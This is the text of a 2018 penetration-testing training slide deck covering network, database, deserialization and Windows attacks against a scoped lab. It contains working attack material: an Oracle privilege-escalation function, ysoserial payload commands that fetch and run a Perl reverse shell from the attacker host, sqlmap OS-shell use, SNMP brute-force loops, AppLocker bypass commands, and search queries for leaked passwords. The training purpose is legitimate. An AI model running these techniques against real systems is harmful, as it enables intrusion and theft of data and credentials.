Advanced Infrastructure Hacking

2018

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

About NotSoSecure
Specialist IT Security Company providing cutting-edge IT security consultancy and training

Pentest Services Training

● Application Pentest ● Advanced Infrastructure Hacking

● Infrastructure Pentest ● Web Hacking - Blackbelt Edition
● Mobile Apps Pentest ● Basic Web Hacking
● Source Code Review ● Basic Infrastructure Hacking
● Red Team Assessment ● Appsec for Developers
● IoT review ● IoT Hacking

For private/corporate training please contact us at training@notsosecure.com

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
About The Trainer

Owen Shearing
● 13+ years a techie
● CREST CCT INF
● Runs @camsec (camsec.org)
● www.rebootuser.com / https://github.com/rebootuser
● @rebootuser

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Setup
Please refer to the related instructions for further details:
• Step 1
– Initiate a connection to the Hacklab VPN
– Use the credentials provided

• Step 2
– Make sure you can reach the Internet after connecting to the VPN

• Step 3
– Refill your coffee!
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
LAB Setup: Configuration Check
• Confirm your VPN connection is working
• Confirm you can login via SSH to your 192.168.X.206 Kali Linux instance
• Change your Kali ‘root’ password to ensure no one can access your Kali
VM
• Confirm you can ping to 192.168.3.215 and that you can still reach the
Internet from your laptop

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Setup: Scope
Targets for Hacking:
– 192.168.3.0/24: shared subnet network
– 192.168.X.0/24: X being your userID

Not in scope:
– 192.168.4.0/24, 192.168.5.0/24
– Any attacks on these networks will result in disqualification from the
training

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Delegate Agreement
Things that could result in disqualification:

• Any DoS activity (such as shutdown/reboot etc.)

• Playing with hosts that are not in scope (including targets not
belonging to you)

• Any IP/MAC spoofing activity

Have fun and let others have fun too! ☺

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
The Art of Making Notes
• Save your notes (especially tool output - it can be a lifesaver)

• Refer to your notes when you get stuck!

• Good notes may get you uid=0(root)!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Syllabus
Networking/CI/Database & Popular Vulnerabilities: Unix:
– IPv4 & IPv6 & Host Discovery – Unix Exploitation
– OSINT & DVCS / CI-CD Exploitation – NFS Attacks
– Database Servers – Shell Escapes
– Popular Vulnerabilities – SSH Tunneling
– Web Server Hacks
Windows: – X11 Hacks
– Enumeration – Privilege Escalation
– AppLocker Bypasses
– Privilege Escalation Specialist:
– Post Exploitation – Docker Exploitation
– Active Directory Delegation – VPN Exploitation
– Lateral Movement – VoIP Exploitation
– Persistence Techniques – VLAN Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Module 1
IPv4 / IPv6 Refresher & Host Discovery

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

ARP Introduction
• Address Resolution Protocol
• A layer 2 protocol
• ARP is a protocol used to map IPv4 addresses to hardware (MAC)
addresses

Example of an ARP request/response:

• IPv4 networks cannot function without ARP...

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Port Scanning
• TCP / UDP Ports (0-65535)
• Specific services are configured to listen on specific ports i.e. HTTP
listens on port 80 by default
• However; services can be configured to listen on non-default ports
• Introducing nmap; a versatile port scanner

nmap -n -vvvv -sT -p0-65535 -A -iL live_host.txt -oA nmap_scan

nmap -n -vvvv -Pn -sU -F -iL live_host.txt -oA nmap_udp_scan

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 1.1
• Perform an arp-scan on the following two networks and identify the
live hosts:
– 192.168.3.0/24
– 192.168.X.0/24

• Identify open ports on each of the hosts identified during previous

question (Both TCP and UDP)

• Identify the host operating system details as well as version details of

the listening services

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After Nmap scan

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

IPv6 Basics
Overview:
• 128-bit (x4 the size of IPv4)
• 8 x 16-bit segments delimited by colons : when in hex format
Example: fe80:0000:0000:0000:e4df:8497:0b8d:bfd9

Reduction:
• Leading 0’s can be removed from the start of a segment
• All zeros segment can be compressed all together (::) - only once!

Full IPv6: fe80:0000:0000:0000:e4df:8497:0b8d:bfd9

Compressed: fe80::e4df:8497:b8d:bfd9
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
IPv6 Basics
Useful to know:
• Localhost ::1/128 (~ 127.0.0.1)
• Link-Local Unicast Addresses FE80::/10 (*generated via mac address)
• Unique Local Unicast Addresses (ULA) FC00::/7
• Global Unicast Addresses 2000::/3
• 6to4: Mapping ipv4 over ipv6
– 2002:V4ADDR::V4ADDR (Windows)
– 2002:V4ADDR::1 (Linux)

Link Local Generation logic:

FE80::2<vendor_Prefix>FF:FE<REMAININGMACID>
*OS dependant
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
IPv6 Basics
• Unicast - a single IP assigned to a single network interface
• Multicast (FF00::/8) - multiple network interfaces (hosts)
– All nodes: FF02::1
– All routers: FF02::2
• Anycast (taken from Global Unicast pool and therefore impossible to distinguish
based on format alone) - multiple network interfaces (hosts) but only a single
network interface (host) needs to respond

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

IPv6 Neighbor Discovery Protocol (NDP)
Router Discovery:
• Used to locate routers on the same link using ICMPv6
– Router Solicitation (type 133) is sent from node to all routers multicast group
– Router Advertisement (type 134) is sent from routers to all nodes multicast
group

• Prefix information (type 3) can be included within the Router Advertisement, which
lists IPv6 prefixes (subnets) that are reachable

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

IPv6 Neighbor Discovery Protocol (NDP)
Address Resolution:
• Similar (from a pentesters POV) to ARP in IPv4
• Used to locate link layer addresses of neighbor systems using ICMPv6
– Neighbor Solicitation (type 135) multicast is sent from node requesting the link
layer address of a neighbor system
– Neighbor Advertisement (type 136) is sent from the ‘owner’ (if online) and
responds with its link layer address
• Only the factors useful for pentesting are covered here
Full details @ https://tools.ietf.org/html/rfc4861

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

IPv6 Neighbor Discovery Protocol (NDP)
• Neighbor Solicitation (type 135)

• Neighbor Advertisement (type 136)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SNMP: Simple Network Management Protocol
• Listens on UDP port 161 by default
• Versions 1, 2c and 3 exist
• Used to manage and collect information from network devices
• SNMP queries objects for information.
• These objects are identified via Object Identifiers (OIDs)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 SNMP OID Values
• OIDs are structured in a hierarchical tree and can be queried for specific information

Example:
To obtain system info: 1.3.6.1.2.1.1
To obtain usernames: 1.3.6.1.4.1.77.1.2.25.1.1

Image Reference: http://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
SNMPv1/2c Overview
• 1 and 2c offer no authentication or encryption capabilities
• Community string required to query or alter the configuration
• Default community strings include:
– public: A user can request information from the device
– private: A user may modify the device configuration

Example:
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.3.100

Scanning 1 hosts, 49 communities

192.168.3.100 [xxxxx] Linux turnkey-oracle-xe-11g 2.6.32-5-amd64 #1 SMP

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SNMPv3 Overview
• Mainly a security enhancement release
• User Based Security Module or Version Based Access Control Module
• New additions
– Security Name: Username
– Security Level: NoAuthNoPriv, AuthNoPriv, AuthPriv
– Auth: MD5 or SHA1
– Priv: DES or AES

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SNMPv3 Online Attack
• Bruteforce tools such as onesixtyone or patator won’t work over IPv6
• snmpget auto detects the correct version of SNMP and performs
requests
• Let's build a quick and dirty bruteforce tool

for i in $(cat /usr/share/doc/onesixtyone/dict.txt); do echo -n

“$i :“; snmpget -v 3 -u $i udp6:[IPv6] MIB_TO_FETCH; done

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 1.2
• Identify various devices listening on an IPv6 address
• Perform a port scan on all IPv6 devices and identify open ports
• Connect to an identified SNMP Server running on IPv6 and extract
sysContact (1.3.6.1.2.1.1.4.0) information

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Extra: IPv4 Tools Over IPv6
• socat
socat -v tcp4-listen:22,fork tcp6-sendto:[fe80::250:56ff:fe9f:a84]:22

• netsh
netsh interface portproxy add v4tov6 listenport=22
connectaddress=fe80::250:56ff:fe9f:a84 connectport=22 protocol=tcp

• Then target the local interface!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After IPv6 Scan

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Module 2
OSINT and DVCS / CI-CD Exploitation

ImageRef: https://i0.wp.com/www.d3lab.net/wp-content/uploads/2016/04/Cloud-OSINT.png?w=967&ssl=1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Information Gathering Methods & Sources
• Open-source intelligence (OSINT) is intelligence collected from publicly available
sources

• With Web 2.0+ information gathering can be both easy as well as complex!
–Easy: Everyone wants to show to everyone what they are doing
–Complex: Information overload!

• OSINT Sources
–Search Engines (Google | Bing)
–Dedicated Engines (Shodan, ZoomEye)
–Public Directories (Domain / Company Registrars)
–Social Media (FB, Linkedin)
–Public Pastes (Pastebin, Pastie)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 OSINT: Examples
• Google Hacking: crafting search queries to get juicy information
inurl:github.com intitle:config intext:"/msg nickserv identify"

ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD

• Shodan: Server Banners

country:US port:23 asn:ASN123456 cisco

• Domain WhoisInfo
$ whois domainname.tld

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

OSINT: Examples

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 2.1
• Enumerate the online presence for the domain identified in Exercise 1.2
• Identify various employees of the company
• Identify leaked credentials
• Identify remote access details

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Distributed Version Control Systems
• Distributed /Decentralized. Everyone has full version history locally

• GIT / Mercurial and many more

• GIT is becoming most popular (Github uses git in the backend)

• This system allows developers to work in isolation as well as continue working even
if the connectivity is lost

• Access could be via HTTP based login or via SSH based access

• One drawback: Generally this results in out of sync work by multiple developers

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

CI / CD Process

Jenkins (CI Server)

Programmers commit Code merges to Builds and deploys it to
Application is deployed
code to the personal mainline(Git) after test/(pre-)production
to production
repository certain checks after running some
optional test cases

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Attacker Process

Developer Machine Security Git Repository Security CI Server Security Production Server Security
Leakage of Source Code Leakage of Source Code Backdoor planting Instant compromise if previous
Source Code Repository Access steps had flaws
Access credentials of Repository
Access to (pre-)production
environment if auto deploy is
enabled

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 2.2
• Identify a weak configuration on the CI Server
• Obtain access to the repository
• Upload a webshell and execute OS commands on the server

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After CI Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Module 3
MySQL, Postgres and Oracle

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Attacking MySQL
● MySQL is a widely used; which makes it an attractive target
● Listens on TCP port 3306 by default
● Typically secured by default with network access controls and built in ACLs
● Vulnerabilities:
○ BACKRONYM (SSL Downgrade - 2015)
○ Remote Authentication Bypass (2012)
○ SQL injection attacks
○ Abusing Management Console access (such as phpMyAdmin)
○ Brute force attack if a direct connection is possible
● The root user of MySQL is almost always present and not configured to lockout
by default

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

MySQL Exploitation
• Getting access to a database is just the beginning

• Various attacks can be performed depending on privileges

• FILE* privilege allows the user to read files on the server

select LOAD_FILE('/etc/passwd');

• Database credentials location: mysql.user table

select * from mysql.user;

Note: It’s always worth checking if your database account has the FILE privilege. The
MySQL root user has this access...
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Postgres Exploitation
• Listens on TCP port 5432 by default
• Default configuration is limited to localhost
• Default user postgres
• UDF Injection allows os code execution as the postgres user

sqlmap -d
postgres://postgres:password@192.168.X.X:5432/post
gres --os-shell

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Oracle
To connect to an Oracle database, you need the following:

• IP:port (default port 1521)

– use Nmap for this

• SID (database name)

– use odat here

• Credentials
– use odat here

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Oracle: The Real World
• Typically you will be able to connect to Oracle as an unprivileged
account such as SCOTT/TIGER

• After connecting you may want to:

– Escalate privileges to become DBA
– With DBA privs execute OS Code

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle For Fun & Pr0fit: #1 & #2
#1: Identify SID #2: Identify default account(s)
odat-libc2.5-x86_64 sidguesser odat-libc2.5-x86_64
-s 192.168.3.100 passwordguesser -d XE -s
[1.1] Searching valid SIDs thanks to 192.168.3.100
a well known SID list on the [+] Valid credentials found:
192.168.3.100:1521 server SCOTT/TIGER. Continue...
[+] 'XE' is a valid SID. Continue... 100%
[+] 'XEXDB' is a valid SID. |##################################
Continue... ###################################
###################################
###################################
###################| Time: 00:00:15
[+] Accounts found on
192.168.3.100:1521/XE: {'SCOTT':
'TIGER'}

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle For Fun & Pr0fit: #3
Connect** to Oracle database with credentials identified and verify your
user privileges:
select * from session_privs

** we recommend using an external tool called Razorsql (www.razorsql.com) for connecting to the database. You can download a FREE 30 day
trial from the razorsql website.

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle For Fun & Pr0fit: #4
Vectors for privilege escalation attacks against Oracle:
• Missing security patches
• Poorly written custom PL/SQL code
• 0 day

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Oracle: Vulnerabilities CPU Jan 2015
Vulnerability: Public role has index privilege on SYS.DUAL table

Exploit:
➔ Create a malicious function as our low privileged user
➔ Create an Index on SYS.DUAL which will execute this function
➔ Query SYS.DUAL
➔ The function will now be executed as SYS

http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle: Demo
CREATE your ‘malicious’ function Create index on sys.dual referencing your
function
CREATE OR REPLACE FUNCTION GETDBA_X
(FOO varchar) return varchar
deterministic authid current_user is create index exploit_index_X on
pragma autonomous_transaction; SYS.DUAL(SCOTT.GETDBA_X('BAR'));
begin
execute immediate 'grant dba to userx
identified by userx';
commit;
return 'FOO';
end;

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle: Demo Continued...
Query Dual to execute your exploit:
select user from sys.dual;

Login as:
userx/userx (DBA user)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle For Fun & Pr0fit: #5
Attack vectors for OS code execution:
• Using Java (XE version does not come with Java)
• Using DBMS_scheduler (universal)

** There are other methods available for executing OS code. Please refer
to Oracle Hacker’s Handbook for more detail.

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking Oracle: OS Code Execution

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 3.1
• Identify a default account within the Oracle database and connect

• Identify the privileges this user has

• Escalate privileges and obtain DBA access

• Using this privileged access, execute OS code and obtain interactive

‘shell’ access as the Oracle user

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

NoSQL Server
• Non relational in nature
• Used for unstructured data storage
• Storage format: Key-value, document, wide-column, graph
• Currently in its adoption stage (infancy)
• Popular programs: Mongo, Cassandra, Couch, Redis and more
• Plagued with basic issues:
– No Authentication required by default (default is limited to localhost)
– Plain text communication channel between client and server
– Plaintext data storage / lack of data encryption

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

MongoDB
• By default listens on 127.0.0.1:27017
• Storage: Document
• No auth required by default
• Client tools: mongo on linux command line or RazorSQL or Robo3T GUI

*https://blog.shodan.io/its-the-data-stupid/
*https://www.mongodb.com/blog/post/how-to-avoid-a-malicious-attack-that-ransoms-your-data#sugg
ested-steps

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

MongoDB vs RDBMS

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Common Commands
List of databases
• show dbs
List of collections
• show collections
Use specific database
• use <dbName>
Add data to database
• db.<dbName>.insert({name:'ABC',role:'Admin',codes:[10,17
,19]})
Find and print data
• db.<dbName>.find()
• db.<dbName>.find().pretty()

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Database Exploitation Summary
• Databases can often be overlooked while performing a network
pentest

• However, they provide an attack surface which can aid an attacker

• Most databases on Windows will run as the privileged SYSTEM

account; OS code execution could lead to further avenues of attack

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After DB Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Module 4
Popular Vulnerabilities

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SSL/TLS Flaws
• Official name TLS: Transport Layer Security
• Multiple versions in place:
–SSLv2
–SSLv3
–TLS 1.0
–TLS 1.1
–TLS 1.2 (most recent)
–TLS 1.3 (in draft stage)
• Historically one of the most attacked layers:
–Heartbleed
–POODLE
–Lucky13
–Apple GOTO Fail
–FREAK / MS15-031
–DROWN
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
HeartBleed
• Upon successful exploitation it is possible to read arbitrary data from the memory
of the target
• A bounds checking vulnerability (maximum) 64kb of data
• A flaw in the heartbeat request (connection check)
• Affected OpenSSL 1.0.1 to 1.0.1f for TLS 1.0, 1.1, and 1.2

DATA ON THE
TLS Heartbleed Request SERVER WHICH YOU
If you are alive respond with “abc” Length 30000 SHOULD NOT HAVE
Request Length - 30000 , Actual Length = 3 S ACCESS TO AT ALL.
E THIS DATA IS USED
R BY THE SERVER.
Client V INCLUDING SSL
E CERTIFICATE
TLS Heartbleed Response PRIVATE KEY
R
abc<junkdata>APIKEYS<junk><password><junk><userid>PRIVATEK
EYOR<more> data=”abc”

Response Length 30000 len=30000

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
HeartBleed: Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

ShellShock
• Another named vulnerability
• Affects any system which allows command execution via Bash
• Bug in parsing of input
• Affects remote script parsing such as CGI
• Affected all Bash versions until 4.3

Example:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
–x is defined from ' to ' i.e. x='() { :;}; echo vulnerable'
–echo vulnerable should be part of function definition

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

ShellShock: Examples
● Vulnerable Code

● Patched Code (Kali

X.206)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Time Challenges (4.1)
• Identify a way to access the the administrative interface on
192.168.3.180

• Once access to the administrative interface is obtained, identify ways

to gain a shell access to the system

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After Heartbleed & ShellShock

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Data Serialization and Deserialization Attacks
• What is Serialization?
– A means of translating data from one form to another
– Used for the storage or transmission of data across a network

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Serialization is everywhere
• Almost all languages have support for Serializiation
– Java
– PHP
– .NET
– COM
– Ruby
– Python
– All other OOP Based languages

• Almost all of them have had bugs in Deserialization routines which

could lead to Remote Code Execution.
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Java Serialization Vulnerability
• Another issue which got little media attention
• Publicly disclosed on 28 January 2015
• PoC published in 06 November 2015
• Fix issued starting from 10 November 2015 onwards
• CVE-2015-4852

PoC :
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-ope
nnms-and-your-application-have-in-common-this-vulnerability/

Slides: http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Java Serialization: How to Detect
• Serialized objects are generally sent across is base64 format. Look for “rO0AB” (if
base64 encoded) or if a ‘raw’ binary is passed look for the hex string “AC ED 00 05
73 72” in requests and responses

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Java Serialization: How to Attack
• We need to send the attack in serialized payload format

• ysoserial: A proof of concept tool to generate serialized payloads

• Sometimes the remote server might not have nc for reverse shell
– /root/Tools/common-collection-exploit/test.txt is a Perl reverse shell
– Other reverse shell one-liners on pentest monkey could be used

• If you use file based shell, you can deliver the reverse shell using wget / curl
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Java Serialization: Payload Generation
• Create the payload to retrieve the Perl code from Kali:
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget
http://192.168.X.206/test.txt -O /tmp/test.pl' > payload_wget.bin

• Create the payload that will call the Perl code and give us shell access:
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'perl /tmp/test.pl
192.168.X.206 9999' > payload_exe.bin

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Java Serialization: Exploit Delivery #1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Java Serialization: Exploit Delivery #2

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Time Challenges (4.2)
• Identify a vulnerability in a service running on 192.168.3.150

• Obtain a reverse shell by exploiting the identified vulnerability

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After Serialization Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Module 5
Hacking Windows

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Agenda
• Host/User Enumeration
• AppLocker/GPO Bypass Techniques
• Privilege Escalation
• Post Exploitation
– Antivirus\AMSI Bypass Techniques
– Exfiltration of Data and Secrets
• Active Directory Delegation Enumeration and Pwnage
• Remote Services, Pivoting and Lateral Movement in a Network
• Persistence
– Golden Ticket and DCSync
– Reviewing other methods
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
 Enumeration #1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Useful Services
Port/Protocol Description
● 88 TCP and UDP ● Network authentication

● 135/TCP and 135/UDP (RPC EPM ) ● MS RPC endpoint mapper (DCE locator service)
● Similar to Sun RPC port mapper
● Services such as Outlook, Exchange, messenger service use this

● 137/UDP and 138/UDP ● NetBIOS browser, naming and lookup functions

● 137/UDP- Browsing requests of NetBIOS over TCP/IP for eg. name
lookup requests such as file sharing, printer, SQL named pipes,
WINS proxy, etc
● 138/UDP - Browsing datagram responses of NetBIOS over TCP/IP e.g
NetLogon service (see services.msc)

● 139 and 445 ● File sharing (CIFS)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

NetBT Name Resolution
• NetBT || NetBIOS over TCP/IP || NBT

• NetBIOS over TCP/IP is the network component that performs computer name to
IP address mapping, name resolution (netbt.sys or vnbt.sys)

• A legacy protocol used for backward compatibility

• Can be queried using the built in Windows utility nbtstat (nmblookup on Linux)
–Windows: nbtstat -a <ip>
–Linux: nmblookup -A 192.168.3.215

• A response of 1C denotes that the host is a Domain Controller (a list of NetBIOS

suffixes @ https://technet.microsoft.com/en-us/library/cc961921.aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

User Enumeration: The Past...
• Depending on the version of OS being targeted (and/or the settings defined within
the security policy) a lot of data may be retrieved - even from an null session!

• A NULL session == blank user name and a blank password:

–Windows: net use \\IP_ADDRESS\ipc$ "" /user:""
–Linux: rpcclient -U "" IP_ADDRESS
• Domain controllers ≤ Windows 2003 are very forthcoming with supplying this data

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SIDs and RIDs
• Unique and assigned sequentially by the local system or, if a domain user, a domain
controller
• Before you can enumerate users, you need to have knowledge of the domain or local
computer identifier

S-1-5-21-2000478354-1708537768-1957994488-500
– S: Identifies the value as a SID
– 1: The revision level/version of the specification
– 5: The top-level authority that issued the SID
– 21: SECURITY_NT_NON_UNIQUE, indicates a domain id will follow
– 2000478354-1708537768-1957994488: The domain or local computer identifier that
issued the SID
– 500: The RID
Well known security identifiers list https://support.microsoft.com/en-us/kb/243330

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

User Enumeration: Today
• What if we have:
– No Null session
– No password
– Now what?

• User Enumeration via Kerberos:

– Non-existent account: KDC_ERR_C_PRINCIPAL_UNKNOWN
– A locked or disabled account: KDC_ERR_CLIENT_REVOKED
– A valid account: KDC_ERR_PREAUTH_REQUIRED

• The prerequisite: We need to have a list of possible usernames to throw at the

server

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

User Enumeration: Kerberos

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

User Enumeration: Recent Developments
• Sensepost - May 2018
• New methods to perform unauthenticated user enumeration
– https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/
– https://github.com/sensepost/UserEnum
• Methods (all require a pre-populated list of usernames):
– DsrGetDcNameEx2
– CLDAP (Connectionless LDAP) Ping
• UDP packet (fast)
• Response codes indicate existence of account - 23 (true) or 25 (false)
– NetBIOS MailSlot Ping
• Response codes indicate existence of account - 23 (true) or 25 (false)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Level Up!
• We have a list of valid accounts, now what?

• Password guessing:
– Most domain accounts will be influenced by a defined password policy
– Account lockout is usually configured
– Unless you can view password policy details we wouldn’t recommend testing
more than 3 passwords per unique account

• Tie in with OSINT activities - any hints, personal information or naming conventions?
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Exercise | Demo 5.1
• There is a Windows domain within the 192.168.3.X/24 network, what is the name?

• Using data gathered during earlier OSINT activities, find valid user accounts on the
identified domain

• Gain RDP access to a workstation within the range 192.168.X.0/24 using one of the
identified accounts

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Domain controller for plum.local ● Host is a member of plum.local

● Through enumeration we found

plum\bob is a valid account

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker & Group Policy Restrictions

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker
“...AppLocker advances the application control features and functionality
of Software Restriction Policies. AppLocker contains new capabilities and
extensions that allow you to create rules to allow or deny applications
from running based on unique identities of files and to specify which users
or groups can run those applications…”

[source] What is AppLocker: https://technet.microsoft.com/en-us/library/ee424367(v=ws.11).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: Overview
• Rules can be defined that control the following:
– Applications
– Scripts
– Installers
– DLL’s
– Packaged Applications

• Conditions can be based upon the following:

– Publisher (i.e. software signed by a specific vendor)
– Path
– File Hash

• Allow/Deny actions can be assigned to a user/group

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
AppLocker: Overview
• Create Default Rules - Mainly based upon Path (esp. exe and script rules)

[Further Information] https://technet.microsoft.com/en-us/library/ee460941(v=ws.11).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
AppLocker: Enumeration
• Rules can be heavily customised

• Therefore something that works in 1 environment, may not in the next!

• Generally an exe rule will dictate which programs can/can’t be run (probably based
on path as this is the default configuration and is relatively unobtrusive/easy to
manage)

• If we have access to PowerShell/cmd our job, in regards to enumeration, becomes

easier
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
AppLocker: Enumeration
• Generating ‘Create Default Rules’ means only programs in the following locations
will execute:
– Program Files directories (32 and 64 bit)
– Windows directory
– Anything elsewhere == nope!

• If we can write to a location that permits execution, we may be able to get access
to some arbitrary code (assuming it’s based on a blacklist/PATH configuration)

• Bypass Checker: https://mssec.wordpress.com/2015/10/22/applocker-bypass-checker/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: Enumeration

https://github.com/3gstudent/Bypass-Windows-AppL
ocker/blob/master/AppLockerBypassChecker-v1.ps1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: Bypass Example #1
• Using regsvr32.exe || rundll32.exe to call a DLL
https://blog.didierstevens.com/2010/02/04/cmd-dll/
C:\Windows\System32\regsvr32.exe "c:\users\%username%\cmd.dll"
C:\Windows\System32\rundll32.exe c:\users\%username%\cmd.dll,Control_RunDLL

• Run PowerShell with DLLs only

https://github.com/p3nt4/PowerShdll

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: Bypass Example #2
Based on research from Casey Smith (@subTee) and techniques divulged by Black Hills
Information Security - http://www.blackhillsinfosec.com/?p=5257

[Condensed Overview]
1. Create a small C# program and define a entry point that will be used by InstallUtil.exe (the
actual bypass technique)

Note: The Install function requires privileges, whereas the uninstall function doesn’t

1. The C# code will call a PowerShell script that we will create

2. Use csc.exe (a compiler that comes with the .NET Framework) to compile the C# code
3. Create the PowerShell script that will be called by the C# program and define the desired
actions
4. Use InstallUtil.exe to run the compiled C# program
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
AppLocker: C# Example
[snip]
public class Program {
public static void Main() { }
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer {
public override void Uninstall(System.Collections.IDictionary savedState){
Mycode.Exec();
}
}
public class Mycode {
public static void Exec() {
DO STUFF...

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.2
• You have a RDP session as Bob on 192.168.X.17. Attempt to execute the following
commands on the host:
– whoami
– ipconfig /all
– net user

Going the extra mile:

